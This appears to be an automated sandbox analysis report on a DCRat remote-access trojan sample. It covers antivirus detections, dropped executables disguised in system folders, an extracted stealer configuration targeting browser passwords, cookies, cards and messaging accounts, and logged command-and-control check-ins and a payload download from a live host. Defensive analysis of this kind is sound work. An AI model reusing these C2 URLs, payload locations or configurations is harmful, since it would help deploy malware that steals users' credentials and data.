Source: http://ca91547.tw1.ru/L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W	Avira URL Cloud: Label: malware
Source: http://ca91547.tw1.ru/L1nc0In.php?kladSzP6lHuJ4aKJis7YXjQcYTaP=5JsuJU&42967b720727e4e345f9f350ee86f8	Avira URL Cloud: Label: malware
Source: http://ca91547.tw1.ru/L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmd	Avira URL Cloud: Label: malware
Source: http://ca91547.tw1.ru/L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=QX9JiI6ISZwYWO0UmM5YTZzI2MjJTO1IGNklDZxUjZ2czYkJjMwICLiEGOiJmN5UGZ2IzYiBjMhRmYlZjZmJWMmRGOjZTO4QzNkRmMxEDOxImI6IiZzgDMyMmM2UGMllzN4QjNiJTYxQWYxM2MlRDO5IGOwICLiMGOkJjZjZWZmFTZzIDZhJWZzITZiFDNxkjZ5E2Y3gDZ0AjMlRzN4EjI6IiMhZGNyI2Y0gDOzQGZ0IWZ0ITO3IWYjJ2YhJzMiRGOxIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W	Avira URL Cloud: Label: malware
Source: http://ca91547.tw1.ru/	Avira URL Cloud: Label: malware
Source: http://ca91547.tw1.ru	Avira URL Cloud: Label: malware
Source: http://ca91547.tw1.ru/L1nc0In.php?kladSzP6lHuJ4aKJis7YXjQcYTaP=5JsuJU&42967b720727e4e345f9f350ee86f808=b2c0a37eb61845d3c0e712bac039aad1&438f148c0e5f9286e56e53eb6890b7d4=QOxEmYzIDMjNGOxEWY5cDZyYzY1kTMkNjM5EjY0MTOiRjNjNzNlVTN&kladSzP6lHuJ4aKJis7YXjQcYTaP=5JsuJU	Avira URL Cloud: Label: malware
Source: http://ca91547.tw1.ru/L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\1874e204d87ca9f9141be23ebad23e1fefcf2d8c.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\0e88ad83-c250-45ca-adc9-aeea84770856.vbs	Avira: detection malicious, Label: VBS/Runner.VPXJ
Source: C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\WinSattl\H4iFvhalfT9t12Rug.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\AppData\Local\Temp\zLSKhC92h1.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\db8b1070-5cc6-4c5d-9632-a5481171a28d.vbs	Avira: detection malicious, Label: VBS/Starter.VPVT
Source: C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984

Found malware configuration

Source: 00000006.00000002.1880642049.0000000012F31000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"SCRT": "{\"Y\":\"#\",\"T\":\" \",\"C\":\"^\",\"V\":\")\",\"p\":\"!\",\"n\":\"`\",\"U\":\"&\",\"d\":\"<\",\"w\":\">\",\"R\":\";\",\"Z\":\"-\",\"0\":\"(\",\"5\":\"|\",\"N\":\",\",\"I\":\"*\",\"3\":\"_\",\"h\":\".\",\"v\":\"@\",\"l\":\"~\",\"D\":\"%\",\"9\":\"$\"}", "PCRT": "{\"9\":\"-\",\"G\":\",\",\"L\":\">\",\"0\":\"%\",\"d\":\"_\",\"F\":\"$\",\"B\":\";\",\"4\":\"#\",\"V\":\"&\",\"W\":\".\",\"Q\":\"`\",\"8\":\" \",\"t\":\"~\",\"j\":\"<\",\"U\":\"(\",\"N\":\"*\",\"J\":\"^\",\"n\":\"!\",\"m\":\"@\",\"K\":\"|\",\"R\":\")\"}", "TAG": "", "MUTEX": "DCR_MUTEX-N62p3D5R1AzNO8T2AwGb", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": true, "ignorepartiallyemptydata": true, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://ca91547.tw1.ru/@==gbJBzYuFDT", "H2": "http://ca91547.tw1.ru/@==gbJBzYuFDT", "T": "0"}

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	ReversingLabs: Detection: 78%
Source: C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	ReversingLabs: Detection: 78%
Source: C:\Program Files\Windows Multimedia Platform\UplbXNLOfTNXjbhPJQLmKdgT.exe	ReversingLabs: Detection: 78%
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	ReversingLabs: Detection: 78%
Source: C:\Users\Default\AppData\UplbXNLOfTNXjbhPJQLmKdgT.exe	ReversingLabs: Detection: 78%
Source: C:\Users\Public\Videos\UplbXNLOfTNXjbhPJQLmKdgT.exe	ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Temp\1874e204d87ca9f9141be23ebad23e1fefcf2d8c.exe	ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	ReversingLabs: Detection: 75%
Source: C:\Windows\Provisioning\Cosa\UplbXNLOfTNXjbhPJQLmKdgT.exe	ReversingLabs: Detection: 78%
Source: C:\Windows\Tasks\UplbXNLOfTNXjbhPJQLmKdgT.exe	ReversingLabs: Detection: 78%

Multi AV Scanner detection for submitted file

Source: LaRHzSijsq.exe

ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1874e204d87ca9f9141be23ebad23e1fefcf2d8c.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: LaRHzSijsq.exe

Joe Sandbox ML: detected

Source: LaRHzSijsq.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Directory created: C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Directory created: C:\Program Files\Common Files\microsoft shared\330defd625eedf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Directory created: C:\Program Files\Windows Multimedia Platform\UplbXNLOfTNXjbhPJQLmKdgT.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Directory created: C:\Program Files\Windows Multimedia Platform\330defd625eedf	Jump to behavior

Source: unknown

HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49730 version: TLS 1.2

Source: LaRHzSijsq.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: ry0bqfj0.vyo.exe, 00000002.00000003.1742337772.0000000006E86000.00000004.00000020.00020000.00000000.sdmp, ry0bqfj0.vyo.exe, 00000002.00000003.1742864417.000000000582F000.00000004.00000020.00020000.00000000.sdmp, ry0bqfj0.vyo.exe, 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmp, ry0bqfj0.vyo.exe, 00000002.00000000.1740871904.0000000000803000.00000002.00000001.01000000.00000007.sdmp, ry0bqfj0.vyo.exe.0.dr
Source:	Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed source: LaRHzSijsq.exe
Source:	Binary string: costura.costura.pdb.compressed source: LaRHzSijsq.exe
Source:	Binary string: costura.costura.pdb.compressed4'^q source: LaRHzSijsq.exe, 00000000.00000002.1742291548.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Nullable`1UInt32ToInt32Dictionary`2<lRencpcIjuzIuqxVSgTADEIaodGVOrDrPhsxoUqFBxhEpdZKwyvHvpzGjdZYJhUSRiTmXaGYQoZfweLldVzpVVVzIMokVrVtCpNhjNMwSxRhptjesOVOHFWVmuElLvdysFChrDbqjdxyeOjoDjRhwhMXsRUPjBKwutOJRbNOMFEEhyRykpIBDVblTEOzImgIsbeKZzxBwduRChPUawETSiSyrDQmnofAyWlgtgyLR><Module>FUDGetHINSTANCE<>OSystem.IOOPTIMZCosturacostura.metadatamscorlibSystem.Collections.GenericReadLoadDownloadAddisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedsubscribesourceCompressionModeExchangenullCacheIDisposableRuntimeTypeHandleGetTypeFromHandleDownloadFileget_Moduleset_WindowStyleProcessWindowStyleget_Nameget_FullyQualifiedNameGetAssemblyResourceNameset_FileNameGetRandomFileNamefullNameGetNamerequestedAssemblyNamenameTypecultureDisposeFileLocateWriteCompilerGeneratedAttributeGuidAttributeDebuggableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeByteget_Valueget_HasValueTryGetValueadd_AssemblyResolveOPTIMZ.exeSystem.ThreadingSystem.Runtime.VersioningCultureToStringAttachGetTempPathget_LengthEndsWithUrinullCacheLockMarshalkernel32.dllurlReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamProgramset_ItemSystemMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.GlobalizationSystem.Reflectionset_PositionStringComparisonCopyToget_CultureInfoget_StartInfoProcessStartInfoAssemblyLoadersenderResolveEventHandlerEnter.ctor.cctorMonitorIntPtrSystem.DiagnosticsSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesReadFromEmbeddedResourcesDebuggingModesGetAssembliesresourceNamessymbolNamesassemblyNamesget_FlagsAssemblyNameFlagsResolveEventArgsargsEqualsget_CharsProcessRunprocessConcatObjectVirtualProtectSystem.Netop_ExplicitExitGetValueOrDefaultToLowerInvariantWebClientStartConvertOPTIMZ_ProcessedByFodyContainsKey<0>__ResolveAssemblyGetCallingAssemblyReadExistingAssemblyGetExecutingAssemblyCopyIsNullOrEmpty source: LaRHzSijsq.exe
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|806F4C19B2D7FD9E3B836269EC07647019A29E95\|7960 source: LaRHzSijsq.exe

Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007DA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		2_2_007DA5F4
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007EB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		2_2_007EB8E0

Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:49735 -> 92.53.106.114:80
Source: Network traffic	Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 92.53.106.114:80 -> 192.168.2.4:49741
Source: Network traffic	Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 92.53.106.114:80 -> 192.168.2.4:49842
Source: Network traffic	Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 92.53.106.114:80 -> 192.168.2.4:50002
Source: Network traffic	Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 92.53.106.114:80 -> 192.168.2.4:49986

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://ca91547.tw1.ru/@==gbJBzYuFDT

Source: global traffic

HTTP traffic detected: GET /UnhitRat/Avast/refs/heads/main/Optmz.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 185.199.109.133 185.199.109.133
Source: Joe Sandbox View	IP Address: 185.199.109.133 185.199.109.133
Source: Joe Sandbox View	IP Address: 92.53.106.114 92.53.106.114

Source: Joe Sandbox View

ASN Name: TIMEWEB-ASRU TIMEWEB-ASRU

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?kladSzP6lHuJ4aKJis7YXjQcYTaP=5JsuJU&42967b720727e4e345f9f350ee86f808=b2c0a37eb61845d3c0e712bac039aad1&438f148c0e5f9286e56e53eb6890b7d4=QOxEmYzIDMjNGOxEWY5cDZyYzY1kTMkNjM5EjY0MTOiRjNjNzNlVTN&kladSzP6lHuJ4aKJis7YXjQcYTaP=5JsuJU HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&71411a4c54be7086c59f1fd61c0b5f77=0VfiIiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiI5EmMiNTMjJTN5EmZjFDZjZDN5kTMyYmYkRjY2cDOiZjZ2YmNwM2NxIiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=QX9JiI6ISZwYWO0UmM5YTZzI2MjJTO1IGNklDZxUjZ2czYkJjMwICLiEGOiJmN5UGZ2IzYiBjMhRmYlZjZmJWMmRGOjZTO4QzNkRmMxEDOxImI6IiZzgDMyMmM2UGMllzN4QjNiJTYxQWYxM2MlRDO5IGOwICLiMGOkJjZjZWZmFTZzIDZhJWZzITZiFDNxkjZ5E2Y3gDZ0AjMlRzN4EjI6IiMhZGNyI2Y0gDOzQGZ0IWZ0ITO3IWYjJ2YhJzMiRGOxIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
